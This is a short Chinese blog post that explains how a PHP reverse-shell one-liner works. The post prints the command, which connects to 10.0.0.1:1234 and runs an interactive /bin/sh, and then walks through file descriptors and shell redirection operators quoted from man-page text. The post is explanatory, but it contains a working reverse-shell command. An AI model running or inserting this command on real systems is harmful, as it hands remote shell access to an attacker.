这条命令是
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'作用是反弹一个交互式的shell
代码看得不太懂,所以很有必要了解一下。
-i interactive Force the shell to behave interactively.
文件描述符,内核(kernel)利用文件描述符(file descriptor)来访问文件。文件描述符是非负整数。打开现存文件或新建文件时,内核会返回一个文件描述符。
0 stdin
1 stdout
2 stderr
Control operators:
& && ( ) ; ;; | || <newline>
Redirection operators:
< > >| << >> <& >& <<- <>
[n]> file Redirect standard output (or n) to file.
[n]>| file Same, but override the -C option.
[n]>> file Append standard output (or n) to file.
[n]< file Redirect standard input (or n) from file.
[n1]<&n2 Duplicate standard input (or n1) from file descriptor
n2.
[n]<&- Close standard input (or n).
[n1]>&n2 Duplicate standard output (or n1) to n2.
[n]>&- Close standard output (or n).
[n]<> file Open file for reading and writing on standard input (or
n).
Background Commands -- &
If a command is terminated by the control operator ampersand (&), the
shell executes the command asynchronously -- that is, the shell does not
wait for the command to finish before executing the next command.
“&&” and “||” are AND-OR list operators.
算是看明白了
创建一个连接到 10.0.0.1:1234 的socket ,得其文件描述符 3。
执行 /bin/sh -i 得到一个交互式的shell
<&3 重定向用户输入的命令到shell
>&3 2>&3 将stdin 和 stderr 重定向到socket
known it then hack it.
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
